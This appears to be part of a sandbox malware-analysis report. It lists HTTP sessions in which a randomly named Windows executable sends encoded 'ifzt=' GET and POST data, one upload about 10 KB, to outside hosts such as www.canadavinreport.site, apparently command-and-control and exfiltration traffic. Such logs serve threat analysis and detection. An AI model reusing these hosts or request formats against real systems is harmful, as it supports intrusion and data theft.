                                                                                                                                                Data Raw: 69 66 7a 74 3d 61 50 30 32 58 77 37 78 55 54 4c 78 71 4d 77 58 73 58 36 41 2b 68 63 33 37 43 34 49 53 49 38 73 36 31 71 36 45 51 6e 35 45 30 36 32 4c 30 77 46 42 52 4d 39 73 76 45 66 6c 39 62 64 6f 69 4d 68 54 4b 75 56 77 76 6e 32 77 34 50 4a 55 68 55 37 38 33 4f 76 68 51 37 76 48 62 65 39 74 34 57 44 4a 52 2b 6e 67 37 4f 59 6b 32 30 59 2f 4e 43 37 69 4e 34 63 4c 47 35 50 2f 77 5a 62 77 30 55 36 4e 56 2b 77 6b 74 51 4d 74 4c 74 49 38 35 4d 6a 4b 42 62 52 34 39 59 4d 42 49 53 6a 4f 72 6e 64 6e 49 73 44 5a 71 34 4c 63 48 69 6f 65 38 39 64 72 65 68 6f 6a 75 33 69 71 35 53 79 47 68 61 56 55 64 6b 72 7a 2b 5a 32 4e 6b 65 55 61 50 4a 4a 42 64 4e 51 76 58 39 46 4f 34 77 5a 62 69 70 31 42 6d 78 6f 65 4a 33 6c 67 75 76 41 2f 67 56 6c 65 48 78 6e 4b 36 52 49 72 31 4d 72 58 69 32 6e 31 45 6f 64 32 36 4e 44 6a 47 71 45 2b 51 4c 6e 5a 65 32 68 39 6f 31 59 58 35 6c 44 50 7a 5a 77 54 42 37 49 61 32 6b 49 62 49 4d 4f 55 52 45 75 6f 2b 2f 76 4f 4b 5a 6b 53 34 6d 74 59 31 62 35 6f 76 2f 75 51 74 51 34 6b 44 32 64 64 [TRUNCATED]
                                                                                                                                                Data Ascii: ifzt=aP02Xw7xUTLxqMwXsX6A+hc37C4ISI8s61q6EQn5E062L0wFBRM9svEfl9bdoiMhTKuVwvn2w4PJUhU783OvhQ7vHbe9t4WDJR+ng7OYk20Y/NC7iN4cLG5P/wZbw0U6NV+wktQMtLtI85MjKBbR49YMBISjOrndnIsDZq4LcHioe89drehoju3iq5SyGhaVUdkrz+Z2NkeUaPJJBdNQvX9FO4wZbip1BmxoeJ3lguvA/gVleHxnK6RIr1MrXi2n1Eod26NDjGqE+QLnZe2h9o1YX5lDPzZwTB7Ia2kIbIMOUREuo+/vOKZkS4mtY1b5ov/uQtQ4kD2ddjdG8ltKd4c4CtHkDmwQs80NOUlbgRV5nmbd2r89dbqdX/NEfv1YA2r4RbBMMlXZFtukVKp49Jt6KTGP8eoVoblblVi6NDF4RFr7Z/gSd4qVB13EYDnq2xXeiUnkOaAaUNTe6j10MayA4k+KrL7uY2uzlL4+p1nS7eETTHhRCwSgUWbLrxif1TRoF+CRFWo97aYUY7eJkJ8Gf6DLvf2+301G7eRtdfR2V6HxvmwNug7f+Ac/pqNuXtGtLTHW6qit78DZ1+sg8bBD+jVq3mSGvRMpUfuw3UrFWjZEHTdmQcOYi3S6IPF7lrmwGtnOyNUFeex7/YsTeRplP+BwRI5dHrBg3SM72dKWoSXrIx3s0DNH4kL0/Fyo3UeV/21HyMCjxdhkbBNtn67GJm5v/F3pEE741bwnT/F3jdt0GdjA7K1uhqzrTGOHCUg5fdN9Q5c8WxCf7Ik5/F8v6snt5EL0OzCH7sl3L+2D9By9EtmBInKYo9YWkEVY9HEeQo/wSpYuqw3dCxFaTFgfJI+PKjYWeaPvPdnGCqzTj6TeYZNukWubE574DIlQpNtnjlVX7oZjeWPQkdGtCewjKUK8HFqUk7UbTKrYxKHXrbvixqpSXjcNU+v4a6jg7RMjcUYnu0vblZwZEQ80qFeJNTegciTqpIQP1XKw1AsKP+X [TRUNCATED]
                                                                                                                                                Nov 25, 2024 09:44:56.021486998 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:55 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                Content-Length: 389
                                                                                                                                                Connection: close
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                36192.168.2.450035209.74.77.108803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:44:57.363040924 CET524OUTGET /aezw/?ifzt=XNcWUHXsHCrFsIBQlHGgjiME8CQZSYUU21qPNzqhKy2oFU8Odgs/t8kovejF8iENVZDP/oOK84yuTx8YyXOBoi/XK/eRsY6lCiyQls/Pp30YwPjl0cgXKAM=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.urbanfashion.website
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Nov 25, 2024 09:44:58.679361105 CET548INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:58 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                Content-Length: 389
                                                                                                                                                Connection: close
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                37192.168.2.450044185.27.134.206803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:45:04.581717968 CET804OUTPOST /vvzz/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.canadavinreport.site
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.canadavinreport.site
                                                                                                                                                Referer: http://www.canadavinreport.site/vvzz/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 52 57 77 7a 6f 52 6e 37 58 70 6f 46 47 64 58 6b 46 36 6e 6f 35 52 66 2f 63 56 4d 45 51 6e 77 68 2f 4e 7a 37 6e 6f 44 43 2f 7a 65 55 6c 63 51 52 73 79 47 48 47 70 72 34 6d 59 64 6d 2b 4f 33 56 64 63 72 7a 61 73 72 59 54 2f 75 55 76 39 70 35 70 52 6c 63 6d 2b 4d 69 2f 68 56 6f 55 41 43 57 79 78 2b 62 65 32 57 33 43 78 30 72 52 41 44 44 76 4a 64 54 48 62 65 58 35 2f 6f 5a 4a 44 70 46 36 61 56 32 66 56 78 30 4a 54 4f 52 58 68 36 38 30 4b 75 67 6b 59 32 55 6c 52 4c 41 4d 78 64 6d 70 47 73 67 66 7a 64 54 64 73 4f 68 4e 6a 4c 31 30 76 6b 56 47 66 5a 46 51 41 53 64 42 50 35 71 6c 41 3d 3d
                                                                                                                                                Data Ascii: ifzt=RWwzoRn7XpoFGdXkF6no5Rf/cVMEQnwh/Nz7noDC/zeUlcQRsyGHGpr4mYdm+O3VdcrzasrYT/uUv9p5pRlcm+Mi/hVoUACWyx+be2W3Cx0rRADDvJdTHbeX5/oZJDpF6aV2fVx0JTORXh680KugkY2UlRLAMxdmpGsgfzdTdsOhNjL10vkVGfZFQASdBP5qlA==
                                                                                                                                                Nov 25, 2024 09:45:05.813123941 CET683INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:45:05 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Encoding: br
                                                                                                                                                Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 ff af a9 a7 2b 8f 74 c8 13 dd 10 d1 7c bb f6 a9 b9 75 32 b3 f7 c0 39 51 27 3a d5 c8 06 df 2c 39 71 c0 13 2e 8f ba d1 4f 78 d5 39 3c fd e7 26 d0 b5 0b 89 41 90 53 12 98 fa a4 87 5a b5 01 7e 52 71 3c c3 64 24 ed 22 ec 2f 30 aa 5b d1 8d 85 f2 75 5f ca 72 82 91 b3 f0 0c c0 29 0b 5f 3f 95 c9 43 26 f2 c2 90 44 1d 1a 04 b9 32 36 1d 38 2c 69 43 13 4e c8 09 e2 be 3d 75 91 78 b6 5b 8f 1c e0 5a 31 f0 f5 43 0d 24 00 b3 46 cb ba 7e 71 61 85 d8 5f fa 7b fa 0f 93 39 c0 cd 7c 2e 77 57 3e 7c 69 98 a7 16 30 a6 0e e2 ca b5 cc fb b6 57 ce f7 89 f5 c1 4b 78 6d be dc cf 15 8e 71 89 31 f1 2f 2e 14 d0 c0 4b f8 b0 cb d9 90 c8 69 bc 3d 09 00 fd 07 76 9c 31 25 85 89 85 4c 92 d4 e4 82 17 9a 67 ac 29 8c 62 22 56 39 26 54 c5 bc 16 45 96 e7 3a b5 d6 16 5c 67 42 e4 85 88 99 48 59 c1 54 2e 5c 11 37 90 7e 1c 73 a3 a5 62 ae 10 79 6a 99 d4 b9 d4 71 cc 78 2e 85 b3 52 28 d7 e2 ca 4c f4 b4 d1 15 c0 14 e0 bf bf a5 5d 2c 01 fb 48 43 02 3b 7f f3 f0 19 1a ab e7 bb e9 d2 d3 34 a5 92 2a 42 7c 5c 21 66 7e 08 ed ee [TRUNCATED]
                                                                                                                                                Data Ascii: 1b98 +t|u29Q':,9q.Ox9<&ASZ~Rq<d$"/0[u_r)_?C&D268,iCN=ux[Z1C$F~qa_{9|.wW>|i0WKxmq1/.Ki=v1%Lg)b"V9&TE:\gBHYT.\7~sbyjqx.R(L],HC;4*B|\!f~,&J1q!_MND7<2h$^BIT4FHe T2-4J+0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                38192.168.2.450045185.27.134.206803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:45:07.243805885 CET824OUTPOST /vvzz/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.canadavinreport.site
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.canadavinreport.site
                                                                                                                                                Referer: http://www.canadavinreport.site/vvzz/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 52 57 77 7a 6f 52 6e 37 58 70 6f 46 45 2b 50 6b 47 64 37 6f 2b 78 66 2b 5a 56 4d 45 65 48 77 6c 2f 4e 2f 37 6e 71 76 53 2f 41 36 55 6c 34 55 52 32 32 61 48 46 70 72 34 79 6f 63 75 6a 65 32 62 64 63 33 42 61 76 7a 59 54 2b 4b 55 76 38 5a 35 75 67 6c 62 6e 75 4d 38 33 42 56 75 51 41 43 57 79 78 2b 62 65 32 43 4e 43 78 38 72 52 7a 4c 44 75 73 68 63 4e 37 65 51 74 76 6f 5a 65 7a 70 4a 36 61 56 49 66 58 49 52 4a 52 47 52 58 67 71 38 31 62 75 76 74 59 32 57 68 52 4b 57 4a 79 38 53 6f 32 46 52 41 41 4a 71 64 73 61 6e 49 6c 47 76 6c 65 46 43 55 66 39 32 4e 48 62 70 4d 4d 45 6a 2b 45 53 41 4f 69 71 68 53 2b 4d 6b 36 50 69 41 57 53 38 44 32 4d 41 3d
                                                                                                                                                Data Ascii: ifzt=RWwzoRn7XpoFE+PkGd7o+xf+ZVMEeHwl/N/7nqvS/A6Ul4UR22aHFpr4yocuje2bdc3BavzYT+KUv8Z5uglbnuM83BVuQACWyx+be2CNCx8rRzLDushcN7eQtvoZezpJ6aVIfXIRJRGRXgq81buvtY2WhRKWJy8So2FRAAJqdsanIlGvleFCUf92NHbpMMEj+ESAOiqhS+Mk6PiAWS8D2MA=
                                                                                                                                                Nov 25, 2024 09:45:08.524236917 CET683INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:45:08 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Encoding: br
                                                                                                                                                Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 ff af a9 a7 2b 8f 74 c8 13 dd 10 d1 7c bb f6 a9 b9 75 32 b3 f7 c0 39 51 27 3a d5 c8 06 df 2c 39 71 c0 13 2e 8f ba d1 4f 78 d5 39 3c fd e7 26 d0 b5 0b 89 41 90 53 12 98 fa a4 87 5a b5 01 7e 52 71 3c c3 64 24 ed 22 ec 2f 30 aa 5b d1 8d 85 f2 75 5f ca 72 82 91 b3 f0 0c c0 29 0b 5f 3f 95 c9 43 26 f2 c2 90 44 1d 1a 04 b9 32 36 1d 38 2c 69 43 13 4e c8 09 e2 be 3d 75 91 78 b6 5b 8f 1c e0 5a 31 f0 f5 43 0d 24 00 b3 46 cb ba 7e 71 61 85 d8 5f fa 7b fa 0f 93 39 c0 cd 7c 2e 77 57 3e 7c 69 98 a7 16 30 a6 0e e2 ca b5 cc fb b6 57 ce f7 89 f5 c1 4b 78 6d be dc cf 15 8e 71 89 31 f1 2f 2e 14 d0 c0 4b f8 b0 cb d9 90 c8 69 bc 3d 09 00 fd 07 76 9c 31 25 85 89 85 4c 92 d4 e4 82 17 9a 67 ac 29 8c 62 22 56 39 26 54 c5 bc 16 45 96 e7 3a b5 d6 16 5c 67 42 e4 85 88 99 48 59 c1 54 2e 5c 11 37 90 7e 1c 73 a3 a5 62 ae 10 79 6a 99 d4 b9 d4 71 cc 78 2e 85 b3 52 28 d7 e2 ca 4c f4 b4 d1 15 c0 14 e0 bf bf a5 5d 2c 01 fb 48 43 02 3b 7f f3 f0 19 1a ab e7 bb e9 d2 d3 34 a5 92 2a 42 7c 5c 21 66 7e 08 ed ee [TRUNCATED]
                                                                                                                                                Data Ascii: 1b98 +t|u29Q':,9q.Ox9<&ASZ~Rq<d$"/0[u_r)_?C&D268,iCN=ux[Z1C$F~qa_{9|.wW>|i0WKxmq1/.Ki=v1%Lg)b"V9&TE:\gBHYT.\7~sbyjqx.R(L],HC;4*B|\!f~,&J1q!_MND7<2h$^BIT4FHe T2-4J+0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                39192.168.2.450046185.27.134.206803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:45:09.914906979 CET10906OUTPOST /vvzz/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.canadavinreport.site
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.canadavinreport.site
                                                                                                                                                Referer: http://www.canadavinreport.site/vvzz/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 52 57 77 7a 6f 52 6e 37 58 70 6f 46 45 2b 50 6b 47 64 37 6f 2b 78 66 2b 5a 56 4d 45 65 48 77 6c 2f 4e 2f 37 6e 71 76 53 2f 41 79 55 6c 4e 41 52 73 58 61 48 45 70 72 34 78 6f 63 74 6a 65 33 48 64 63 76 46 61 76 2f 69 54 39 69 55 73 62 78 35 76 53 4e 62 75 75 4d 38 6f 52 56 76 55 41 43 35 79 33 65 66 65 32 53 4e 43 78 38 72 52 79 62 44 75 35 64 63 65 72 65 58 35 2f 70 59 4a 44 70 6c 36 61 39 59 66 58 4d 76 49 67 6d 52 58 42 61 38 32 70 47 76 6d 59 32 51 73 78 4b 65 4a 79 77 4e 6f 32 59 75 41 42 4e 4d 64 75 47 6e 4a 53 62 50 32 4f 64 6c 50 50 68 4a 65 58 7a 75 49 64 77 6b 36 6a 4b 61 43 44 6d 54 43 50 45 4a 31 76 6e 2b 54 78 67 31 67 36 74 2b 70 59 5a 4b 69 7a 65 77 38 6b 73 4d 4d 53 69 74 55 54 70 30 70 57 36 6d 33 79 6d 53 30 52 4b 56 67 71 45 59 50 6a 56 52 78 43 56 39 65 55 73 53 73 44 48 66 6d 76 63 6a 4e 33 38 6b 68 64 6e 52 63 44 32 54 37 78 55 56 74 44 67 45 69 79 44 65 61 50 30 30 76 56 68 55 54 6d 64 52 7a 58 4b 4f 71 35 52 77 69 41 44 43 73 37 4c 77 69 62 48 44 4b 64 56 48 4e [TRUNCATED]
                                                                                                                                                Data Ascii: ifzt=RWwzoRn7XpoFE+PkGd7o+xf+ZVMEeHwl/N/7nqvS/AyUlNARsXaHEpr4xoctje3HdcvFav/iT9iUsbx5vSNbuuM8oRVvUAC5y3efe2SNCx8rRybDu5dcereX5/pYJDpl6a9YfXMvIgmRXBa82pGvmY2QsxKeJywNo2YuABNMduGnJSbP2OdlPPhJeXzuIdwk6jKaCDmTCPEJ1vn+Txg1g6t+pYZKizew8ksMMSitUTp0pW6m3ymS0RKVgqEYPjVRxCV9eUsSsDHfmvcjN38khdnRcD2T7xUVtDgEiyDeaP00vVhUTmdRzXKOq5RwiADCs7LwibHDKdVHNNKpbzTpc0lb2wV7zuPbmILBwsDGcnnLM/qboo9RFCB7MlDyntt/yS5F6j7SmCnz+QMMSH/SUiSXfQA6zzyVfIjH+PXd70hJuJw0npaFrgfWkfe55TlONfWJwkC/gYaz0oJvLJ7Z7KG0KkFXdgHdyF/4deI2gdi6Y4tN0DLreXqWsbRtSIV9LIHJ0ttCXJeOIUz5CXRZE+283uV9zaSxXQuBrZMupse/naGfQzP2pHow8Wg3NZIROhTzhW5ieOocthZ0IgqoZk3Zg5Qf0C7DK67xNhBQD+xwAoex7bNVMY1Kh7xYFhkzD53nSu1GrAZWwDEbODgLP6BrkEHzY2b6s+yQl/mrsfyzEm4L98J5UFRRmcSjG9aSir+v5j3zJwBOjHX7sl+vM7wYliNEBMz32UZykMXEMx61ul3/VX1Mb4e23KbHICci9VXuXoD/xwbXHCkvI0Flbd9lgKQ13UN/r3B1YhAODf7aGwYBye0/6N9AbVcuEW5Aex5nKpJY2KTbVAOzNUTOblfIPel2Q9/2DJr7YJEaYx9XsY8DJ36mRyYIrZyNUpI5ffzaXzJA0ttrJbGEMTxpIlCYigSjZymMnPgDNJ9bfIstsFeL6pqMtmjJTafKqWnpY/uvajYBw8xq+bq9ObhdUV4MOVFrFDNOVMlCvk3GJTvj4nE [TRUNCATED]
                                                                                                                                                Nov 25, 2024 09:45:11.241317987 CET683INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:45:11 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Encoding: br
                                                                                                                                                Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 ff af a9 a7 2b 8f 74 c8 13 dd 10 d1 7c bb f6 a9 b9 75 32 b3 f7 c0 39 51 27 3a d5 c8 06 df 2c 39 71 c0 13 2e 8f ba d1 4f 78 d5 39 3c fd e7 26 d0 b5 0b 89 41 90 53 12 98 fa a4 87 5a b5 01 7e 52 71 3c c3 64 24 ed 22 ec 2f 30 aa 5b d1 8d 85 f2 75 5f ca 72 82 91 b3 f0 0c c0 29 0b 5f 3f 95 c9 43 26 f2 c2 90 44 1d 1a 04 b9 32 36 1d 38 2c 69 43 13 4e c8 09 e2 be 3d 75 91 78 b6 5b 8f 1c e0 5a 31 f0 f5 43 0d 24 00 b3 46 cb ba 7e 71 61 85 d8 5f fa 7b fa 0f 93 39 c0 cd 7c 2e 77 57 3e 7c 69 98 a7 16 30 a6 0e e2 ca b5 cc fb b6 57 ce f7 89 f5 c1 4b 78 6d be dc cf 15 8e 71 89 31 f1 2f 2e 14 d0 c0 4b f8 b0 cb d9 90 c8 69 bc 3d 09 00 fd 07 76 9c 31 25 85 89 85 4c 92 d4 e4 82 17 9a 67 ac 29 8c 62 22 56 39 26 54 c5 bc 16 45 96 e7 3a b5 d6 16 5c 67 42 e4 85 88 99 48 59 c1 54 2e 5c 11 37 90 7e 1c 73 a3 a5 62 ae 10 79 6a 99 d4 b9 d4 71 cc 78 2e 85 b3 52 28 d7 e2 ca 4c f4 b4 d1 15 c0 14 e0 bf bf a5 5d 2c 01 fb 48 43 02 3b 7f f3 f0 19 1a ab e7 bb e9 d2 d3 34 a5 92 2a 42 7c 5c 21 66 7e 08 ed ee [TRUNCATED]
                                                                                                                                                Data Ascii: 1b98 +t|u29Q':,9q.Ox9<&ASZ~Rq<d$"/0[u_r)_?C&D268,iCN=ux[Z1C$F~qa_{9|.wW>|i0WKxmq1/.Ki=v1%Lg)b"V9&TE:\gBHYT.\7~sbyjqx.R(L],HC;4*B|\!f~,&J1q!_MND7<2h$^BIT4FHe T2-4J+0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                40192.168.2.450047185.27.134.206803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:45:12.568989038 CET524OUTGET /vvzz/?ifzt=cUYTrm/9WoUGLtXnEfHvigyvVWYscXEqz9Hmi7WWzB+Eo/kiz1zVNsrH4IZXq93JBsPKcKHGWPOW5+N9njVZg9AZ40ltQReYzymzYn/PGSkLTDv/+fBeI5c=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.canadavinreport.site
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Nov 25, 2024 09:45:13.851711988 CET1183INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:45:13 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 982
                                                                                                                                                Connection: close
                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                Cache-Control: no-cache
